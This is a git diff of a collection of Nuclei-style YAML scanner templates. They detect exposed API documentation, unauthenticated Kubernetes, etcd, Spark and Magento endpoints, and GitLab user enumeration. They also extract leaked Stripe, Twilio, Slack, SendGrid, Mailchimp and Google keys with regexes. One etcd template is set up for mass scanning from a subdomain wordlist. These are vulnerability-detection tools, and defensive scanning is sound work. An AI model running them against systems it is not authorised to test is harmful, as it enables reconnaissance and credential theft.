"FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or diff --git a/poc/api/fastapi-docs-7399.yaml b/poc/api/fastapi-docs-7399.yaml index e0925b7940..794df02ac0 100644 --- a/poc/api/fastapi-docs-7399.yaml +++ b/poc/api/fastapi-docs-7399.yaml @@ -1,22 +1,22 @@ -id: fastapi-docs - -info: - name: FastAPI Docs - author: github.com/its0x08 - severity: info - tags: fastapi,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/docs" - - "{{BaseURL}}/redoc" - - "{{BaseURL}}/openapi.json" - - matchers: - - type: word - words: - - "FastAPI - Swagger UI" - - "FastAPI - ReDoc" - - '{"title":"FastAPI"' - condition: or +id: fastapi-docs + +info: + name: FastAPI Docs + author: github.com/its0x08 + severity: info + tags: fastapi,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + + matchers: + - type: word + words: + - "FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or diff --git a/poc/api/gitlab-api-user-enum-7668.yaml b/poc/api/gitlab-api-user-enum-7668.yaml index da88f8d2fa..40bafaf2d9 100644 --- a/poc/api/gitlab-api-user-enum-7668.yaml +++ b/poc/api/gitlab-api-user-enum-7668.yaml @@ -1,9 +1,12 @@ id: gitlab-api-user-enum info: - author: Suman_Kar name: GitLab - User Information Disclosure Via Open API + author: Suman_Kar severity: medium - reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + metadata: + shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure requests: - raw: diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index e335cf9397..6d6aac772a 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,22 +1,28 @@ id: gitlab-api-user-enum + info: - author: Suman_Kar name: GitLab - User Information Disclosure Via Open API + author: Suman_Kar severity: medium - reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: + max-request: 100 shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure -requests: + +http: - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} + payloads: uid: helpers/wordlists/numbers.txt stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -26,10 +32,14 @@ requests: - "username.*" - "id.*" - "name.*" + - type: word part: header words: - "application/json" + - type: status status: - 200 + +# digest: 4b0a00483046022100e91d88c0e5b8fc728356db398d1642b8928c8b06e2d15eb1b1d8aa7370e1ebe1022100f00de311f83fd9785f1655ac58104c405353183930d8524cc2802d7a98096df8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/gmail-api-client-secrets-7741.yaml b/poc/api/gmail-api-client-secrets-7741.yaml deleted file mode 100644 index 72f7d06ecc..0000000000 --- a/poc/api/gmail-api-client-secrets-7741.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: gmail-api-client-secrets - -info: - name: GMail API - Detect - author: geeknik - severity: info - description: GMail API was detected. - reference: https://developers.google.com/gmail/api/auth/web-server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/client_secrets.json" - - matchers-condition: and - matchers: - - type: word - words: - - "client_id" - - "auth_uri" - - "token_uri" - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - -# digest: 4a0a00473045022100e423f2d50edff69e6eb1b5bc47e8f482b97de447024a3623818e28a08199321a02207f96b638e3b21026d86306511d783491c0cc00d9484b54499fe7cfea40baead3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/google-api-key-7768.yaml b/poc/api/google-api-key-7768.yaml index 87d61eaa24..1d863c0dbe 100644 --- a/poc/api/google-api-key-7768.yaml +++ b/poc/api/google-api-key-7768.yaml @@ -1,23 +1,16 @@ id: google-api-key - info: name: Google API Key author: Swissky severity: info - metadata: - max-request: 2 tags: exposure,token,google - -http: +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/hopfully404" - extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" - -# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/graylog-api-browser-7846.yaml b/poc/api/graylog-api-browser-7846.yaml new file mode 100644 index 0000000000..6f78c1d3a8 --- /dev/null +++ b/poc/api/graylog-api-browser-7846.yaml @@ -0,0 +1,22 @@ +id: graylog-api-browser +info: + name: Detect Graylog REST API + author: PR3R00T + severity: info + tags: tech,graylog +requests: + - method: GET + path: + - "{{BaseURL}}/api/api-browser/" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Graylog" + - "REST API browser" + - "swagger" + condition: and + - type: status + status: + - 200 diff --git a/poc/api/graylog-api-browser.yaml b/poc/api/graylog-api-browser.yaml deleted file mode 100644 index 6c93a114fa..0000000000 --- a/poc/api/graylog-api-browser.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: graylog-api-browser - -info: - name: Detect Graylog REST API - author: PR3R00T - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/api/api-browser/" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Graylog" - - "REST API browser" - - "swagger" - condition: and - - type: status - status: - - 200 diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml deleted file mode 100644 index 1c523c0a06..0000000000 --- a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: http-etcd-unauthenticated-api-data-leak -info: - name: etcd Unauthenticated HTTP API Leak - author: dhiyaneshDk - severity: high - reference: https://hackerone.com/reports/1088429 - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and - matchers: - - type: word - words: - - '"roles"' - - '"permissions"' - - '"role"' - - '"kv"' - condition: and - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/plain" diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..ba35991570 --- /dev/null +++ b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml @@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth + +requests: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + matchers-condition: and + matchers: + - type: word + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/api/kube-api-namespaces-8505.yaml b/poc/api/kube-api-namespaces-8505.yaml new file mode 100644 index 0000000000..083c018d9d --- /dev/null +++ b/poc/api/kube-api-namespaces-8505.yaml @@ -0,0 +1,25 @@ +id: kube-api-namespaces +info: + name: Kube API Namespaces + author: sharath + severity: info + description: Scans for kube namespaces + tags: tech,k8s,kubernetes,devops,kube + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"NamespaceList":' + - '"items":' + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-namespaces-8506.yaml b/poc/api/kube-api-namespaces-8506.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces-8506.yaml +++ b/poc/api/kube-api-namespaces-8506.yaml @@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/kube-api-nodes-8507.yaml b/poc/api/kube-api-nodes-8507.yaml index 0b108b7d35..29b885b67e 100644 --- a/poc/api/kube-api-nodes-8507.yaml +++ b/poc/api/kube-api-nodes-8507.yaml @@ -1,25 +1,25 @@ id: kube-api-nodes info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - '"NodeList":' - '"items":' - condition: and \ No newline at end of file + condition: and + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and diff --git a/poc/api/kube-api-nodes-8508.yaml b/poc/api/kube-api-nodes-8508.yaml deleted file mode 100644 index 29b885b67e..0000000000 --- a/poc/api/kube-api-nodes-8508.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath,ritikchaddha - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: or - matchers: - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and - - type: word - part: body - words: - - '"containerRuntimeVersion"' - - '"kubeletVersion": "v' - condition: and diff --git a/poc/api/kube-api-nodes.yaml b/poc/api/kube-api-nodes.yaml deleted file mode 100644 index 8e44c71d24..0000000000 --- a/poc/api/kube-api-nodes.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and diff --git a/poc/api/kube-api-pods-8510.yaml b/poc/api/kube-api-pods-8510.yaml index 2355efbaa9..c9cfbdb979 100644 --- a/poc/api/kube-api-pods-8510.yaml +++ b/poc/api/kube-api-pods-8510.yaml @@ -1,22 +1,26 @@ id: kube-api-pods + info: name: Kube API Pods author: sharath severity: info description: Scans for kube pods tags: tech,k8s,kubernetes,devops,kube + requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/pods" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - '"PodList":' - '"items":' - condition: and + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-pods.yaml b/poc/api/kube-api-pods.yaml new file mode 100644 index 0000000000..2355efbaa9 --- /dev/null +++ b/poc/api/kube-api-pods.yaml @@ -0,0 +1,22 @@ +id: kube-api-pods +info: + name: Kube API Pods + author: sharath + severity: info + description: Scans for kube pods + tags: tech,k8s,kubernetes,devops,kube +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/default/pods" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"PodList":' + - '"items":' + condition: and diff --git a/poc/api/kube-api-services-8513.yaml b/poc/api/kube-api-services-8513.yaml index bb3ef2795d..23f55153e4 100644 --- a/poc/api/kube-api-services-8513.yaml +++ b/poc/api/kube-api-services-8513.yaml @@ -1,15 +1,12 @@ id: kube-api-services - info: name: Kube API Services author: sharath severity: info description: Scans for kube services - metadata: - max-request: 1 tags: tech,k8s,kubernetes,devops,kube -http: +requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/services" @@ -25,6 +22,4 @@ http: words: - '"ServiceList":' - '"items":' - condition: and - -# digest: 4a0a0047304502202b0d9ac2494ecda58a3bfa5ad44584acf84d11b5e27bbcc97f267f0e6a425cdc022100d42f7df8fa23d59562f41fd65da5f3b2cea2a181b0234fec38d2bd43fff541c0:922c64590222798bb761d5b6d8e72950 + condition: and \ No newline at end of file diff --git a/poc/api/kube-api-services-8514.yaml b/poc/api/kube-api-services-8514.yaml index 0fd4dad91f..c037f8f678 100644 --- a/poc/api/kube-api-services-8514.yaml +++ b/poc/api/kube-api-services-8514.yaml @@ -1,26 +1,22 @@ id: kube-api-services - info: name: Kube API Services author: sharath severity: info description: Scans for kube services tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/default/services" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"ServiceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git a/poc/api/magento-2-exposed-api-8687.yaml b/poc/api/magento-2-exposed-api-8687.yaml index c5d33f7ec1..b249920ed9 100644 --- a/poc/api/magento-2-exposed-api-8687.yaml +++ b/poc/api/magento-2-exposed-api-8687.yaml @@ -4,7 +4,10 @@ info: author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + metadata: + shodan-query: http.component:"Magento" tags: magento requests: - method: GET diff --git a/poc/api/magento-2-exposed-api-8688.yaml b/poc/api/magento-2-exposed-api-8688.yaml new file mode 100644 index 0000000000..ddf8e7633a --- /dev/null +++ b/poc/api/magento-2-exposed-api-8688.yaml @@ -0,0 +1,45 @@ +id: magento-2-exposed-api + +info: + name: Exposed Magento 2 API + author: TechbrunchFR + severity: info + description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + metadata: + shodan-query: http.component:"Magento" + tags: magento + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/V1/products' + - '{{BaseURL}}/rest/V1/store/storeConfigs' + - '{{BaseURL}}/rest/V1/store/storeViews' + + matchers-condition: or + matchers: + - type: dsl + dsl: + - 'contains(body, "searchCriteria")' + - 'contains(body, "parameters")' + - 'contains(body, "message")' + - 'contains(tolower(all_headers), "application/json")' + condition: and + + - type: dsl + dsl: + - 'contains(body, "secure_base_link_url")' + - 'contains(body, "timezone")' + - 'contains(tolower(all_headers), "application/json")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "name")' + - 'contains(body, "website_id")' + - 'contains(tolower(all_headers), "application/json")' + - 'status_code == 200' + condition: and \ No newline at end of file diff --git a/poc/api/mailchimp-api-key-8722.yaml b/poc/api/mailchimp-api-key-8722.yaml index fb0d8ec4c2..14819b8241 100644 --- a/poc/api/mailchimp-api-key-8722.yaml +++ b/poc/api/mailchimp-api-key-8722.yaml @@ -1,22 +1,20 @@ id: mailchimp-access-key-value - info: name: Mailchimp API Value author: puzzlepeaches - severity: info - metadata: - max-request: 1 - tags: exposure,token,mailchimp - -http: + severity: medium +requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "[0-9a-f]{32}-us[0-9]{1,2}" extractors: - type: regex part: body regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a0047304502207e0ab7518b414240980df385f972649a53d23d4cbdd9541a4b521a4785fd5f34022100d07a1f2d85bf26f3a817e8ccca7af3b238d06d93be9c3da1020682d0170d7fc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/mailchimp-api-key-8726.yaml b/poc/api/mailchimp-api-key-8726.yaml deleted file mode 100644 index 14819b8241..0000000000 --- a/poc/api/mailchimp-api-key-8726.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: mailchimp-access-key-value -info: - name: Mailchimp API Value - author: puzzlepeaches - severity: medium -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" - extractors: - - type: regex - part: body - regex: - - "[0-9a-f]{32}-us[0-9]{1,2}" diff --git a/poc/api/mailchimp-api.yaml b/poc/api/mailchimp-api.yaml index 09657f0502..7e5a4bad37 100644 --- a/poc/api/mailchimp-api.yaml +++ b/poc/api/mailchimp-api.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file,mailchimp + file: - extensions: - all @@ -13,5 +14,3 @@ file: - type: regex regex: - "[0-9a-f]{32}-us[0-9]{1,2}" - -# digest: 4a0a00473045022044dc0414ef16f4cc2e54af8fb429d909233c3da5b9930d856d2d3a07caf5c184022100b714c99dcc1a53d01e2e20070ed6b094b841d629c949e98cef1ee1b382b8b1a4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/mailgun-api-11855.yaml b/poc/api/mailgun-api(1).yaml similarity index 100% rename from poc/api/mailgun-api-11855.yaml rename to poc/api/mailgun-api(1).yaml diff --git a/poc/api/pictatic-api-key-9576.yaml b/poc/api/pictatic-api-key-9576.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/api/pictatic-api-key-9576.yaml +++ b/poc/api/pictatic-api-key-9576.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/api/pictatic-api-key.yaml b/poc/api/pictatic-api-key.yaml index 41ea01a136..946aed1ebf 100644 --- a/poc/api/pictatic-api-key.yaml +++ b/poc/api/pictatic-api-key.yaml @@ -1,5 +1,4 @@ id: pictatic-api-key - info: name: Pictatic API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "sk_live_[0-9a-z]{32}" - -# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/sendgrid-api-key-10140.yaml b/poc/api/sendgrid-api-key-10140.yaml index 88f920b11b..76506d7b27 100644 --- a/poc/api/sendgrid-api-key-10140.yaml +++ b/poc/api/sendgrid-api-key-10140.yaml @@ -3,7 +3,7 @@ info: name: Sendgrid API Key Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,sendgrid requests: - method: GET path: diff --git a/poc/api/sendgrid-api.yaml b/poc/api/sendgrid-api.yaml index a67fb048a4..f8d5d81271 100644 --- a/poc/api/sendgrid-api.yaml +++ b/poc/api/sendgrid-api.yaml @@ -1,4 +1,5 @@ id: sendgrid-api-key-file + info: name: Sendgrid API Key author: gaurang @@ -7,7 +8,10 @@ info: file: - extensions: - all + extractors: - type: regex regex: - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" + +# digest: 4a0a00473045022100db3f9a4cb5ada6fcbe3bd6a463777cce68b4be7280b1525801bb93a81b89202602207901c7654fe5318ee02a07a99fee9560c2c840e9232933e9c4f49c5f7c7ea0a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/slack-api.yaml b/poc/api/slack-api.yaml index ea761c24d4..6f17ee55d5 100644 --- a/poc/api/slack-api.yaml +++ b/poc/api/slack-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: high tags: token,file,slack - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "xox[baprs]-([0-9a-zA-Z]{10,48})?" + +# digest: 4b0a00483046022100ba3776e008af0a4e7848a73adf72eb7a16913a260d81182aeac50bc9d167c3d3022100d24a73474fbec04e1368b575900583a20922f4cc0fc702c636f53651fc17f939:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/strapi-documentation-10543.yaml b/poc/api/strapi-documentation-10542.yaml similarity index 100% rename from poc/api/strapi-documentation-10543.yaml rename to poc/api/strapi-documentation-10542.yaml diff --git a/poc/api/strapi-page-10544.yaml b/poc/api/strapi-page-10544.yaml index abec659651..d62760234f 100644 --- a/poc/api/strapi-page-10544.yaml +++ b/poc/api/strapi-page-10544.yaml @@ -3,7 +3,8 @@ info: name: Strapi Page author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 tags: api,strapi requests: - method: GET diff --git a/poc/api/strapi-page.yaml b/poc/api/strapi-page-10545.yaml similarity index 100% rename from poc/api/strapi-page.yaml rename to poc/api/strapi-page-10545.yaml diff --git a/poc/api/stripe-api-key(1).yaml b/poc/api/stripe-api-key(1).yaml new file mode 100644 index 0000000000..d65411c71f --- /dev/null +++ b/poc/api/stripe-api-key(1).yaml @@ -0,0 +1,16 @@ +id: stripe-api-key + +info: + name: Stripe API Key + author: gaurang + severity: high + tags: token,file,stripe + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/stripe-api-key-11869.yaml b/poc/api/stripe-api-key-11869.yaml deleted file mode 100644 index 5624af050d..0000000000 --- a/poc/api/stripe-api-key-11869.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: stripe-api-key -info: - name: Stripe API Key - author: gaurang - severity: high - tags: token,file,stripe -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/poc/api/twilio-api-10860.yaml b/poc/api/twilio-api-10860.yaml new file mode 100644 index 0000000000..f1a98cc01b --- /dev/null +++ b/poc/api/twilio-api-10860.yaml @@ -0,0 +1,13 @@ +id: twilio-api +info: + name: Twilio API Key + author: gaurang + severity: high + tags: token,file +file: + - extensions: + - all + extractors: + - type: regex + regex: + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" diff --git a/poc/api/twilio-api-10861.yaml b/poc/api/twilio-api-10861.yaml deleted file mode 100644 index 9895746a8a..0000000000 --- a/poc/api/twilio-api-10861.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: twilio-api - -info: - name: Twilio API Key - author: gaurang - severity: high - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/twilio-api.yaml b/poc/api/twilio-api.yaml index 94674dffe2..9895746a8a 100644 --- a/poc/api/twilio-api.yaml +++ b/poc/api/twilio-api.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: high tags: token,file + file: - extensions: - all @@ -12,6 +13,4 @@ file: extractors: - type: regex regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" - -# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/unauth-spark-api-10963.yaml b/poc/api/unauth-spark-api-10963.yaml index 504318c39a..5575a73ff9 100644 --- a/poc/api/unauth-spark-api-10963.yaml +++ b/poc/api/unauth-spark-api-10963.yaml @@ -3,26 +3,30 @@ id: unauth-spark-api info: name: Unauthenticated Spark REST API author: princechaddha - severity: medium + severity: critical description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: - https://xz.aliyun.com/t/2490 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. + metadata: + max-request: 1 tags: spark,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/v1/submissions" + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - "Missing an action" @@ -30,4 +34,4 @@ requests: part: body condition: and -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022018b659baec610f87c26890d0fb5845caeb74f982b891f1d7962fc76f1cc74819022100fbbd51799d7374a2ec8d0ce526872a8541093e2d98a549188fca7c8890f25681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/unauth-spark-api.yaml b/poc/api/unauth-spark-api.yaml deleted file mode 100644 index 2025d7145b..0000000000 --- a/poc/api/unauth-spark-api.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauth-spark-api -info: - name: Unauthenticated Spark REST API - author: princechaddha - severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - remediation: Restrict access the exposed API ports. - reference: https://xz.aliyun.com/t/2490 - tags: spark,unauth - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/v1/submissions" - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Missing an action" - - "serverSparkVersion" - part: body - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/poc/api/wadl-api-11082.yaml b/poc/api/wadl-api-11082.yaml deleted file mode 100644 index 1e046a7ef3..0000000000 --- a/poc/api/wadl-api-11082.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: wadl-api -info: - name: wadl file disclosure - author: 0xrudra,manuelbua - severity: info - tags: exposure,api - reference: - - https://github.com/dwisiswant0/wadl-dumper - - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ -requests: - - method: GET - path: - - "{{BaseURL}}/application.wadl" - - "{{BaseURL}}/application.wadl?detail=true" - - "{{BaseURL}}/api/application.wadl" - - "{{BaseURL}}/api/v1/application.wadl" - - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true - matchers: - - name: http-get - type: word - words: - - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" - - "http://wadl.dev.java.net/2009/02" - - method: OPTIONS - path: - - "{{BaseURL}}" - - "{{BaseURL}}/api/v1" - - "{{BaseURL}}/api/v2" - stop-at-first-match: true - matchers: - - name: http-options - type: word - words: - - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" - - "http://wadl.dev.java.net/2009/02" diff --git a/poc/api/wadl-api-11084.yaml b/poc/api/wadl-api-11084.yaml index 84a5ac47dd..35e018d786 100644 --- a/poc/api/wadl-api-11084.yaml +++ b/poc/api/wadl-api-11084.yaml @@ -1,22 +1,13 @@ id: wadl-api - info: - name: WADL API - Detect - author: 0xrudra,manuelbua + name: wadl file disclosure + author: 0xrudra & manuelbua severity: info - description: WADL API was detected. - reference: + tags: exposure,api + reference: | - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 8 - tags: exposure,api - -http: +requests: - method: GET path: - "{{BaseURL}}/application.wadl" @@ -24,29 +15,26 @@ http: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - - stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" - + condition: or + part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - - stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" - -# digest: 4b0a00483046022100e2f839e3c09ac43f2fef563e3df53c2508374f88b7a6440f5b8e77a7dbefcc05022100a0f7c47efacbf012afecb48f03f8c1f63a337bf8b96061929d5a1de831f61d79:922c64590222798bb761d5b6d8e72950 + condition: or + part: body diff --git a/poc/api/wadl-api-11085.yaml b/poc/api/wadl-api-11085.yaml index 9f1cbe09ec..1e046a7ef3 100644 --- a/poc/api/wadl-api-11085.yaml +++ b/poc/api/wadl-api-11085.yaml @@ -1,5 +1,4 @@ id: wadl-api - info: name: wadl file disclosure author: 0xrudra,manuelbua @@ -8,7 +7,6 @@ info: reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - requests: - method: GET path: @@ -17,7 +15,6 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true matchers: - name: http-get @@ -26,13 +23,11 @@ requests: - "This is simplified WADL with user and core resources only" - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - stop-at-first-match: true matchers: - 